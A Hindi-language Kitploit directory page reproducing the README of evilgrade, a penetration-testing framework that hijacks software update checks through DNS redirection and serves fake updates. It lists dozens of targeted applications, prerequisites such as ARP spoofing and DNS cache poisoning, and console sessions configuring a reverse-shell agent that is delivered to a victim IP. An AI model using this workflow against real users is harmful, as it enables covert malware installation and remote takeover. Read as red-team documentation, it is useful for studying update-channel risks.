Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
evilgrade — Evilgrade एक मॉड्यूलर फ्रेमवर्क है जो उपयोगकर्ता को खराब अपग्रेड कार्यान्वयन का लाभ उठाने की अनुमति देता है, नकली अपडेट इंजेक्ट करके। | Kitploit
उपकरण/GitHubGitHub/infobyte/evilgrade
शोषण फ्रेमवर्कपेलोड जनरेशनवेब प्रॉक्सी और अवरोधनपेनिट्रेशन टेस्टिंगसामाजिक इंजीनियरिंगरेड टीमिंगDNS विश्लेषण
GitHubinfobyte/evilgrade

evilgrade

Evilgrade एक मॉड्यूलर फ्रेमवर्क है जो उपयोगकर्ता को खराब अपग्रेड कार्यान्वयन का लाभ उठाने की अनुमति देता है, नकली अपडेट इंजेक्ट करके।

रिपॉजिटरी देखेंवेबसाइट
1.3k276385 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Faraday Security Research -- | ISR-evilgrade | www.faradaysec.com | --

.:: [संक्षिप्त अवलोकन] ::.

Evilgrade एक मॉड्यूलर फ्रेमवर्क है जो उपयोगकर्ता को नकली अपडेट इंजेक्ट करके खराब अपग्रेड कार्यान्वयन का लाभ उठाने की अनुमति देता है। यह पहले से तैयार बाइनरी (एजेंट), तेज पेंटेस्ट के लिए एक काम करने वाला डिफ़ॉल्ट कॉन्फ़िगरेशन, और अपने स्वयं के WebServer और DNSServer मॉड्यूल के साथ आता है। नई सेटिंग्स स्थापित करना आसान है, और जब नए बाइनरी एजेंट सेट किए जाते हैं तो इसका एक ऑटोकॉन्फ़िगरेशन होता है।

* मुझे evilgrade का उपयोग कब करना चाहिए?

यह फ्रेमवर्क तब काम आता है जब हमलावर होस्टनाम रीडायरेक्शन (पीड़ित के DNS ट्रैफ़िक में हेरफेर) करने में सक्षम होता है, और ऐसा 2 परिदृश्यों में किया जा सकता है:

आंतरिक परिदृश्य:
  • आंतरिक DNS एक्सेस
  • ARP स्पूफिंग
  • DNS कैश पॉइज़निंग
  • DHCP स्पूफिंग
  • TCP हाइजैकिंग
  • वाई-फाई एक्सेस पॉइंट प्रतिरूपण
बाहरी परिदृश्य:
  • आंतरिक DNS एक्सेस
  • DNS कैश पॉइज़निंग
* यह कैसे काम करता है?

Evilgrade मॉड्यूल के साथ काम करता है, प्रत्येक मॉड्यूल में एक कार्यान्वित संरचना होती है जो किसी विशिष्ट एप्लिकेशन/सिस्टम के लिए नकली अपडेट का अनुकरण करने के लिए आवश्यक होती है।

* कौन से ओएस समर्थित हैं?

ISR-Evilgrade क्रॉस-प्लेटफॉर्म है, यह केवल शोषण के लिए सही लक्ष्य प्लेटफॉर्म के लिए उपयुक्त पेलोड होने पर निर्भर करता है।

कार्यान्वित मॉड्यूल:


  • Freerip 3.30
  • Jet photo 4.7.2
  • Teamviewer 5.1.9385
  • ISOpen 4.5.0
  • Istat.
  • Gom 2.1.25.5015
  • Atube catcher 1.0.300
  • Vidbox 7.5
  • Ccleaner 2.30.1130
  • Fcleaner 1.2.9.409
  • Allmynotes 1.26
  • Notepad++ 5.8.2
  • Java 1.6.0_22 winxp/win7
  • aMSN 0.98.3
  • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
  • Mirc 7.14
  • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
  • Dap 9.5.0.3
  • Winscp 4.2.9
  • AutoIt Script 3.3.6.1
  • Clamwin 0.96.0.1
  • AppTapp Installer 3.11 (Iphone/Itunes)
  • getjar (facebook.com)
  • Google Analytics Javascript injection
  • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
  • Winamp 5.581
  • TechTracker (cnet) 1.3.1 (Build 55)
  • Nokiasoftware firmware update 2.4.8es - (Windows software)
  • Nokia firmware v20.2.011
  • BSplayer 2.53.1034
  • Apt ( < Ubuntu 10.04 LTS)
  • Ubertwitter 4.6 (0.971)
  • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
  • Cpan 1.9402
  • VirtualBox (3.2.8 )
  • Express talk
  • Filezilla
  • Flashget
  • Miranda
  • Orbit
  • Photoscape.
  • Panda Antirootkit
  • Skype
  • Sunbelt
  • Superantispyware
  • Trillian <= 5.0.0.26
  • Adium 1.3.10 (Sparkle Framework)
  • VMware
  • more...
  • /docs/CHANGES

.:: [मुख्य उपयोग] ::.

यह एक IOS कंसोल के समान काम करता है``` evilgrade>help Type 'help command' for more detailed help on a command. Commands: configure - Configure - no help available exit - exits the program help - prints this screen, or help on 'command' reload - Reload to update all the modules - no help available restart - Restart webserver - no help available set - Configure variables - no help available show - Display information of . start - Start webserver - no help available status - Get webserver status - no help available stop - Stop webserver - no help available version - Display framework version. - no help available

Object: options - Show options of current module. vhosts - Show VirtualHosts of current module. modules - List all modules available for use. active - Show active modules.

## कार्यान्वित मॉड्यूल की सूची``` console
evilgrade>show modules

List of modules:
===============

...
...
...

- 63 modules available.

एक निर्दिष्ट मॉड्यूल कॉन्फ़िगर करें``` console

evilgrade>conf sunjava evilgrade(sunjava)>

#### सभी VirtualHosts दिखाएँ।
#### VirtualHost फ़ील्ड में वे डोमेन हैं जिन्हें हमारा वेबसर्वर हमारे लिए अनुकरण करने वाला है।``` console
evilgrade>show vhosts

Virtual hosts:
=============

[
  "java.sun.com",
  "javadl-esd.sun.com",
  ...
  ...
  ...
]

वर्तमान मॉड्यूल के विकल्प दिखाएं।

agent: यह हमारा नकली अपडेट बाइनरी है, हमें उस पथ को सेट करना होगा जहां यह स्थित है या एक गतिशील नकली अपडेट बाइनरी जनरेशन लागू करना होगा (ADVANCED देखें)।``` console

evilgrade(sunjava)>show options

Display options:

Name = Sun Microsystems Java Version = 2.0 Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] Description = "" VirtualHost = "java.sun.com|javadl-esd.sun.com"

.-------------------------------------------------------------------------------------------------------------------------. | Name | Default | Description | +--------------+-------------------------------------------------+--------------------------------------------------------+ | website | http://java.com/moreinfolink | Website displayed in the update | | enable | 1 | Status | | atitle | Critical vulnerability | Title name to be displayed in the systray item popup | | arg | | Arg passed to Agent | | adescription | This critical update fix internal vulnerability | Description to be displayed in the systray item popup | | description | This critical update fix internal vulnerability | Description to be displayed during the update | | agent | ./agent/reverseshellsign.exe | Agent to inject | | title | Critical update | Title name displayed in the update | '--------------+-------------------------------------------------+--------------------------------------------------------'

#### सेवाएँ प्रारंभ करें (DNS Server and WebServer)``` console
evilgrade>start
evilgrade>
[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...

#### Waiting for victims

evilgrade>
[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"
evilgrade>
[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"
evilgrade>
[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"
evilgrade>
[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"

स्थिति और पीड़ित लॉग दिखाएँ``` console

evilgrade>show status Webserver (pid 4134) already running

Users status:

.---------------------------------------------------------------------------------------------------------------. | Client | Module | Status | Md5,Cmd,File | +----------------+------------------+--------+------------------------------------------------------------------+ | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" | '----------------+------------------+--------+------------------------------------------------------------------'

## .:: [गहन उपयोग] ::.

### कमांड
#### configure / conf - <module-name> कॉन्फ़िगर करें

उदाहरण:
-------``` console
evilgrade>configure sunjava
evilgrade(sunjava)>

evilgrade>conf sunjava
evilgrade(sunjava)>

## 'conf' takes us back to the global configuration
evilgrade(sunjava)>conf
evilgrade>

टूल डाउनलोड करें